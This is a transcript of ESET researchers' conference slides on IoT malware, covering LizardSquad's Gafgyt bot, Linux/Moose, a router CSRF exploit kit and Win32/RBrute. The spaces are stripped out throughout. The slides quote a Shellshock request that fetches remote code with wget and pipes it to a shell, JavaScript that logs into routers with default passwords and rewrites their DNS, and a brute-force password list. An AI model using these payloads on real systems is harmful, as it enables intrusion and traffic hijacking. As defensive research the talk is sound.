IoT or Internet of - eset.github.io
Transcript of IoT or Internet of - eset.github.io
.
IoTorInternetof{Things,Threats}
Thomas(@nyx__o)MalwareResearcheratESETCTFloverOpensourcecontributor
Olivier(@obilodeau)MalwareResearcheratESETInfoseclectureratETSUniversityinMontrealPreviouslyinfosecdeveloper,networkadmin,linuxsystemadmin
Co-founderMontrehack(hands-onsecurityworkshops)FounderNorthSecHackerJeopardy
AgendaAboutIOTLizardSquadLinux/MooseExploitKitWin32/RBruteConclusion
WhyItMatters?HardtodetectHardtoremediateHardtofixLowhangingfruitforbadguys
ARealThreatSeveralcasesdisclosedinthelasttwoyearsAlotofsame-oldbackgroundnoise(DDoSer)Thingsareonlygettingworse
Wait,isIoTmalwarereallyaboutthings?
No.Notyet.No.Notyet.
Sowhatkindofmalwarecanwefindonsuchinsecuredevices?
LizardSquadLizardSquad
WhoareLizardSquad?BlackhathackinggroupLotsofDistributedDenialofService(DDoS)DDoSPlayStationNetworkandXboxliveinChristmas2014BombthreatsDDoSforhire(LizardStresser)
DesCYBER-DesCYBER-CHENAPANS!CHENAPANS!
TheMalwareLinux/GafgytLinux/Powbot,Linux/Aidra,Kaiten,…Probablyothers,assourceispublic
THISISABOT.ANIRCBOT.YOUWILLLIKETHISBOTANDTHISBOTWILLLIKEYOU.ITISVERYTINYANDWILLNOTTAKEUPMUCHOFYOURSPACEANDTIME.ITISAVERYUNIVERSALBOT.ITWILLWORKONALMOSTANYTHINGYOUWANTITTOWORKON.THISISABOT.ANIRCBOT.
CaracteristicsTelnetscannerFlooding:UDP,TCP,JunkandHold
if(!strcmp(argv[0],"LOLNOGTFO")){exit(0);}
SomeServerCodeif(send(thefd,"\x1b[31m*****************************************\r\n",48,MSG_NOSIGNAL)==-1)if(send(thefd,"*WELCOMETOTHEBALLPIT*\r\n",43,MSG_NOSIGNAL)==-1)gotoend;if(send(thefd,"*Nowwith\x1b[32mrefrigerator\x1b[31msupport*\r\n",53,MSG_NOSIGNAL)==-if(send(thefd,"*****************************************\r\n\r\n>\x1b[0m",51,MSG_NOSIGNAL)==-
AttackVectorsShellshockSSHcredentialsbrute-forceTelnetcredentialsbrute-force
ExempleofShellshockAttempt
GET/cgi-bin/authLogin.cgiHTTP/1.1Host:127.0.0.1Cache-Control:no-cacheConnection:Keep-AlivePragma:no-cacheUser-Agent:(){goo;};wget-qO-http://o.kei.su/qn|sh>/dev/null2>&1&
OtherVariantsHTTPSsupportCloudFlareprotectionbypass
Sophisticated?LizardStresserdatabasewasleakedPasswordsinplaintext…
IRCCommandandControl
-------Daychangedto08/25/15-------09:32-!-Thereare0usersand2085invisibleon1servers09:32-!-42unknownconnection(s)09:32-!-3channelsformed09:32-!-Ihave2085clientsand0servers09:32-!-20852119Currentlocalusers2085,max211909:32-!-20852119Currentglobalusers2085,max2119
BotMasters12:56-!-Topicfor#Fazzix:1k12:56-!-Topicsetbyvoid<>(WedAug1909:58:452015)12:56[Users#Fazzix]12:56[~void][~void_][@bob1k][@Fazzix][Myutro]·12:56-!-Irssi:#Fazzix:Totalof5nicks(4ops,0halfops,0voices,1normal)12:56-!-Channel#FazzixcreatedMonAug1703:11:29201512:56-!-Irssi:Jointo#Fazzixwassyncedin2secs
Linux/MooseLinux/Moose
Linux/MooseDiscoveredinNovember2014Thoroughlyanalyzedinearly2015PublishedareportinlateMay2015
MooseDNAakaMalwaredescription
Hangtight,thisisarecap
Linux/Moose…Namedafterthestring"elan"presentinthemalware
executable
Elan…?
TheLotusElan
ElánTheSlovakrockband(from1969andstillactive)
NetworkCapabilitiesPivotthroughfirewallsHome-madeNATtraversalCustom-madeProxyserviceonlyavailabletoasetofwhitelistedIPaddresses
RemotelyconfiguredgenericnetworksnifferDNSHijacking
AttackVectorTelnetcredentialsbruteforceWordlistof304user/passentriessentbyserver
CompromiseProtocol
Anti-AnalysisStaticallylinkedbinarystrippedofitsdebuggingsymbolsHardtoreproduceenvironmentrequiredformalwaretooperateMisleadingstrings(getcool.com)
MooseHerdingTheMalwareOperation
ViaC&CConfigurationNetworksnifferwasusedtostealHTTPCookiesTwitter:twll,twidFacebook:c_userInstagram:ds_user_idGoogle:SAPISID,APISIDGooglePlay/Android:LAY_ACTIVE_ACCOUNTYoutube:LOGIN_INFO
ViaProxyUsageAnalysisNatureoftrafficProtocolTargetedsocialnetworks
AnExample
AnExample(cont.)
AnExample(cont.)
AnExample(cont.)
Anti-TrackingWhitelistmeanswecan’tusetheproxyservicetoevaluatemalwarepopulationBlindbecauseofHTTPSenforcedonsocialnetworksDNSHijacking’sRogueDNSserversneverrevealed
AStrangeAnimal
DifferentFocusnotintheDDoSorbitcoinminingbusinessnox86variantfoundcontrolledbyasinglegroupofactors
Missing"Features"NopersistencemechanismNoshellaccessforoperators
ThoughtBig,RealizedLittle?
Insocialnetworkfraud,networksnifferirrelevantDNSHijackingpossiblebutonlyforfewdevicesNoadfraud,spam,DDoS,etc.
Status
WhitepaperImpactFewweeksafterthepublicationtheC&CserverswentdarkAfterareboot,allaffecteddevicesshouldbecleanedButvictimscompromisedviaweakcredentials,sotheycanalwaysreinfect
Aliveordead?
Yay!Except…
Linux/MooseUpdateNewsampleinSeptember
Newproxyserviceport(20012)NewC&CselectionalgorithmLotsofdifferencesStillunderscrutiny
ExploitKitTargetingExploitKitTargetingRoutersRouters
ExploitKitDefinitionAutomateexploitationTargetsbrowsersCommonexploitsareAdobeandJava
source:Malwarebytes
ExploitKitinAction
ExploitKitinAction(cont.)
Cross-SiteRequestForgery(CSRF)Usesdefaultcredential(HTTP)ChangesprimaryDomainNameSystem(DNS)
ExploitKitCSRF<html><head><scripttype="text/javascript"src<body><iframeid="iframe"sandbox="allow-same-origin"<scriptlanguage="javascript">
ExploitKitHow-Tofunctione_belkin(ip){varmethod="POST";varurl="";vardata="";url="http://"+ip+"/cgi-bin/login.exe?pws=admin"exp(url,"","GET");url="http://"+ip+"/cgi-bin/setup_dns.exe";data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="exp(url,data,method);}
ExploitKitHow-Tofunctione_moto(ip){/*varmethod="GET";varurl="http://"+ip+"/frames.asp?userId=admin&password=motorolaexp(url,"",method);url='http://'+ip+'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gatewayexp(url,"",POST);*/vari1=document.createElement('IMG');document.body.appendChild(i1);vari2=document.createElement('IMG');document.body.appendChild(i2);i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola';i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="
ExploitKitImprovementObfuscationCommonVulnerabilitiesandExposures(CVE)
ExploitKit-CVECVE-2015-1187D-LinkDIR-636LRemoteCommandInjectionIncorrectAuthentication
RecapExploitKitChangeDNSFileless
WhatCanTheyDo?Bank/webmoneyMITMPhishingAdfraud
YouSaidAdfraud?InjectionviaGoogleanalyticsdomainhijackingJavascriptrunsincontextofeverypage
ExempleofGoogleAnalyticsSubstitution'adcash':function(){varadcash=document.createElement('script'adcash.type='text/javascript';adcash.src='http://www.adcash.com/script/java.php?option=rotateur&r=274944'document.body.appendChild(adcash);},
Win32/RBrute(cont.)Triestofindadministrationwebpages(IP)ScanandreportRoutermodelisextractedfromtherealmattributeoftheHTTPauthentication
Win32/RBruteTargets$stringsrbrute.exe[...]TD-W8901GTD-W8901GBTD-W8951NDTD-W8961NDTD-8840TTD-W8961NDTD-8816TD-8817TD-W8151NTD-W8101GZXDSL831CIIZXV10W300[...]DSL-2520UDSL-2600UDSLrouterTD-W8901GTD-W8901G3.0TD-W8901GBTD-W8951NDTD-W8961ND
Win32/RBruteBruteforceLogins:admin,support,root&AdministratorPasswordlistretrievedfromtheCnC
<emptystring>1111111234512345612345678abc123adminAdministratorconsumerdragongizmodoiqrquksmletmeinlifehackmonkeypasswordqwertyrootsoporteETB2006support
Win32/RBruteChangingDNS
http://<router_IP>&dnsserver=<malicious_DNS>&dnsserver2=8.8.8.8&Save=Savehttp://<router_IP>dnscfg.cgi?dnsPrimary=<malicious_DNS>http://<router_IP>Enable_DNSFollowing=1&dnsPrimary=
Win32/RBruteNextStepSimpleredirectiontofakeChromeinstaller(facebookorgoogledomains)Install(useractionrequired)ChangeprimaryDNSonthecomputer(viakeyregistry)
HKLM/SYSTEM/ControlSet001/Services/Tcpip/Parameters/Interfaces/{networkinterfaceUUID}/NameServer
WhyreinfectsomeonebyRBruteandnotSality?
Win32/RBruteInACoffeeShop
InfecteduserInfectedrouterEveryoneisinfected
RBruteandSality
ConclusionEmbeddedmalware
NotyetcomplexToolsandprocessesneedtocatchupalowhangingfruitPreventionsimple
ThanksThankyou!ESETCanadaResearchTeam
Questions?Questions?
@obilodeau@nyx__o
Referenceshttp://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdfhttp://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.htmlhttps://gist.github.com/josephwegner/1d20f1ce1d59b61172e1http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/